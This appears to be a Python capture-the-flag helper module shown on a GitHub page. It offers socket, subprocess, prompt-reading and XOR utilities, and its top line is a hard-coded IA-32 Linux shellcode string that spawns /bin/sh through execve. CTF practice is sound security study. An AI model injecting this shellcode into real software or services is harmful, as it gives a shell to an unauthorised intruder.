-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathctf.py
73 lines (64 loc) · 2.24 KB
/
ctf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import socket
import subprocess
import os, fcntl
# basic IA-32 shellcode
SHELLCODE="\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80"
# create a file that corresponds to a TCP socket to a remote host
# arguments:
# host - hostname and port number in standard string
# format (e.g. 'example.com:1337')
# returns:
# a file object f
# notes:
# - the file objects are buffered by default, so you will need
# to call f.flush() to send a packet over the wire.
def tcp(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = host.split(':')
s.connect((host[0], int(host[1])))
return s.makefile()
# communicate with a subprocess
# arguments:
# cmd - shell command (redirections, etc. are supported)
# returns:
# a tuple fd with three elements:
# fd[0]: subprocess's stdin
# fd[1]: subprocess's stdout
# fd[2]: subprocess's stderr
# Notes:
# - remember that fd[0].readline() will keep the trailing newline, so
# EOF will return '' and blank line will return '\n'. Also, remember
# to rstrip() if necessary
def localcmd(cmd):
s = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
setNonBlocking(s.stdout)
setNonBlocking(s.stderr)
return (s.stdin, s.stdout, s.stderr)
def setNonBlocking(fd):
flags=fcntl.fcntl(fd, fcntl.F_GETFL)
flags=flags | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
# read from a file/socket until a certain string is reached
# useful for disregarding input until you get to a prompt
# use in conjunction with formatted i/o functions or readline()
# arguments:
# f - file/socket object to read from
# key - prompt to search for
# example:
# if f contains:
# 'foo bar baz > quux derp'
# then if you do:
# readUntil(f, ' > ')
# print(f.readline().rstrip().split()[0])
# the output will be:
# quux
def readUntil(f, key):
# get dummy string of same length as key
buf = ''.join(chr((ord(c) + 1) & 0xFF) for c in key)
while buf != key:
buf = buf[1:] + f.read(1)
#xor a string with a key
# both inputs are expected as strings
#
def xor(key, plain):
return "".join(chr(ord(c)^ord(key)) for c in plain)